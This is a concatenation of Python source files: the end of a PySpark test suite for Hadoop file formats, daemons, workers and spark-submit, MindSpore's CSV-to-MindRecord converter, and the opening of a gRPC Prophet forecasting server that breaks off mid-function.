"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class TestOutputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class TestDaemon(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class TestWorker(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_fd_leak(self):
N = 1100 # fd limit is 1024 by default
rdd = self.sc.parallelize(range(N), N)
self.assertEquals(N, rdd.count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
class TestSparkSubmit(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
class ContextStopTests(unittest.TestCase):
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = map(gammaln, x)
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
if __name__ == "__main__":
if not _have_scipy:
print "NOTE: Skipping SciPy tests as it does not seem to be installed"
if not _have_numpy:
print "NOTE: Skipping NumPy tests as it does not seem to be installed"
unittest.main()
if not _have_scipy:
print "NOTE: SciPy tests were skipped as it does not seem to be installed"
if not _have_numpy:
print "NOTE: NumPy tests were skipped as it does not seem to be installed"
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Note:
For details about Examples, please refer to `Converting CSV Dataset <https://
www.mindspore.cn/tutorials/zh-CN/master/advanced/dataset/record.html#converting-csv-dataset>`_.
Args:
source (str): The file path of csv.
destination (str): The MindRecord file path to transform into, ensure that no file with the same name
exists in the directory.
columns_list(list[str], optional): A list of columns to be read. Default: None.
partition_number (int, optional): The partition size, Default: 1.
Raises:
ValueError: If `source`, `destination`, `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self._check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
def _check_columns(self, columns, columns_name):
"""
Validate the columns of csv
"""
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
def _get_row_of_csv(self, df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self._get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(csv_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally.
Returns:
MSRStatus, SUCCESS or FAILED.
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
|
server.py
|
from concurrent import futures
from forecaster.prophet import Forecaster as ProphetForecaster
from multiprocessing import Event, Process, cpu_count
from pythonjsonlogger import jsonlogger
import contextlib
import grpc
import logging
import model.api.forecast_pb2_grpc as grpc_lib
import os
import signal
import socket
import sys
import time
class ForecastServicer(ProphetForecaster):
def __init__(self, logger):
self.logger = logger
def pretty_timedelta(self, seconds):
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if days > 0:
return '{:d}d{:d}h{:d}m{:d}s'.format(days, hours, minutes, seconds)
elif hours > 0:
return '{:d}h{:d}m{:d}s'.format(hours, minutes, seconds)
elif minutes > 0:
